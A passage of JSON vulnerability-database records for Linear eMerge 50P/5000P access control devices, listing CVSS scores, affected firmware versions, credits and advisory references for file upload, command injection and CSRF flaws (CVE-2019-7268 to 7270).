"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-34615",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-158703",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 10.0,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7268",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7268",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2019-34615",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-095",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-158703",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34615"
},
{
"db": "VULHUB",
"id": "VHN-158703"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006077"
},
{
"db": "NVD",
"id": "CVE-2019-7268"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-095"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge 50P/5000P devices allow Unauthenticated File Upload. Linear eMerge 50P/5000P The device contains a vulnerability related to unlimited uploads of dangerous types of files.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Linear eMerge 50P / 5000P is a browser-managed access control security system from Nortek Security \u0026 Control. An attacker could use this vulnerability to upload a file with an arbitrary extension to a directory in the application\u0027s Web root directory and execute the uploaded file with the permissions of the Web server",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7268"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006077"
},
{
"db": "CNVD",
"id": "CNVD-2019-34615"
},
{
"db": "VULHUB",
"id": "VHN-158703"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7268",
"trust": 3.1
},
{
"db": "ICS CERT",
"id": "ICSA-20-184-01",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "155250",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006077",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-095",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-34615",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2294",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "47610",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-158703",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34615"
},
{
"db": "VULHUB",
"id": "VHN-158703"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006077"
},
{
"db": "NVD",
"id": "CVE-2019-7268"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-095"
}
]
},
"id": "VAR-201907-0169",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34615"
},
{
"db": "VULHUB",
"id": "VHN-158703"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34615"
}
]
},
"last_update_date": "2023-12-18T13:23:40.542000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.nortekcontrol.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006077"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-434",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158703"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006077"
},
{
"db": "NVD",
"id": "CVE-2019-7268"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.applied-risk.com/resources/ar-2019-006"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7268"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/155250/linear-emerge50p-5000p-4.6.07-remote-code-execution.html"
},
{
"trust": 1.7,
"url": "https://applied-risk.com/labs/advisories"
},
{
"trust": 1.7,
"url": "https://www.us-cert.gov/ics/advisories/icsa-20-184-01"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7268"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/47610"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2294/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34615"
},
{
"db": "VULHUB",
"id": "VHN-158703"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006077"
},
{
"db": "NVD",
"id": "CVE-2019-7268"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-095"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-34615"
},
{
"db": "VULHUB",
"id": "VHN-158703"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006077"
},
{
"db": "NVD",
"id": "CVE-2019-7268"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-095"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-34615"
},
{
"date": "2019-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158703"
},
{
"date": "2019-07-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-006077"
},
{
"date": "2019-07-02T17:15:12.257000",
"db": "NVD",
"id": "CVE-2019-7268"
},
{
"date": "2019-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-095"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-34615"
},
{
"date": "2020-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158703"
},
{
"date": "2019-07-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-006077"
},
{
"date": "2022-10-13T19:52:07.833000",
"db": "NVD",
"id": "CVE-2019-7268"
},
{
"date": "2020-08-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-095"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-095"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge 50P/5000P Device unrestricted upload vulnerability type file vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006077"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-095"
}
],
"trust": 0.6
}
}
VAR-201907-0170
Vulnerability from variot - Updated: 2023-12-18 13:23Linear eMerge 50P/5000P devices allow Authenticated Command Injection with root Code Execution. Linear eMerge 50P/5000P The device includes OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Nortek Security & Control Linear eMerge 50P/5000P is a browser-based access control security control system developed by Nortek Security & Control Company in the United States. The vulnerability stems from the fact that the network system or product does not correctly filter special characters, commands, etc. in the process of constructing executable commands of the operating system from external input data. Attackers can exploit this vulnerability to execute illegal operating system commands
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0170",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linear emerge 50p",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "4.6.07"
},
{
"model": "linear emerge 5000p",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "4.6.07"
},
{
"model": "linear emerge 5000p",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge 50p",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006015"
},
{
"db": "NVD",
"id": "CVE-2019-7269"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_50p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.6.07",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_50p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_5000p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.6.07",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_5000p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7269"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LiquidWorm,Sipke Mellema",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-094"
}
],
"trust": 0.6
},
"cve": "CVE-2019-7269",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2019-7269",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-158704",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7269",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7269",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-094",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-158704",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158704"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006015"
},
{
"db": "NVD",
"id": "CVE-2019-7269"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-094"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge 50P/5000P devices allow Authenticated Command Injection with root Code Execution. Linear eMerge 50P/5000P The device includes OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Nortek Security \u0026 Control Linear eMerge 50P/5000P is a browser-based access control security control system developed by Nortek Security \u0026 Control Company in the United States. The vulnerability stems from the fact that the network system or product does not correctly filter special characters, commands, etc. in the process of constructing executable commands of the operating system from external input data. Attackers can exploit this vulnerability to execute illegal operating system commands",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7269"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006015"
},
{
"db": "VULHUB",
"id": "VHN-158704"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7269",
"trust": 2.5
},
{
"db": "ICS CERT",
"id": "ICSA-20-184-01",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "155250",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006015",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-094",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2020.2294",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "47608",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "47624",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-158704",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158704"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006015"
},
{
"db": "NVD",
"id": "CVE-2019-7269"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-094"
}
]
},
"id": "VAR-201907-0170",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-158704"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:23:40.517000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.nortekcontrol.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006015"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158704"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006015"
},
{
"db": "NVD",
"id": "CVE-2019-7269"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.applied-risk.com/resources/ar-2019-006"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/155250/linear-emerge50p-5000p-4.6.07-remote-code-execution.html"
},
{
"trust": 1.7,
"url": "https://applied-risk.com/labs/advisories"
},
{
"trust": 1.7,
"url": "https://www.us-cert.gov/ics/advisories/icsa-20-184-01"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7269"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7269"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/47624"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2294/"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/47608"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158704"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006015"
},
{
"db": "NVD",
"id": "CVE-2019-7269"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-094"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-158704"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006015"
},
{
"db": "NVD",
"id": "CVE-2019-7269"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-094"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158704"
},
{
"date": "2019-07-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-006015"
},
{
"date": "2019-07-02T17:15:12.320000",
"db": "NVD",
"id": "CVE-2019-7269"
},
{
"date": "2019-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-094"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158704"
},
{
"date": "2019-07-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-006015"
},
{
"date": "2022-10-13T19:54:47.307000",
"db": "NVD",
"id": "CVE-2019-7269"
},
{
"date": "2020-08-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-094"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-094"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge 50P/5000P In the device OS Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006015"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-094"
}
],
"trust": 0.6
}
}
VAR-201907-0171
Vulnerability from variot - Updated: 2023-12-18 13:23Linear eMerge 50P/5000P devices allow Cross-Site Request Forgery (CSRF). Nortek Security & Control Linear eMerge 50P/5000P is a browser-based access control security control system developed by Nortek Security & Control Company in the United States. The vulnerability stems from the WEB application not adequately verifying that the request is from a trusted user. An attacker could exploit this vulnerability to send unexpected requests to the server through an affected client
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0171",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linear emerge 50p",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "4.6.07"
},
{
"model": "linear emerge 5000p",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "4.6.07"
},
{
"model": "linear emerge 5000p",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge 50p",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006017"
},
{
"db": "NVD",
"id": "CVE-2019-7270"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_50p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.6.07",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_50p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
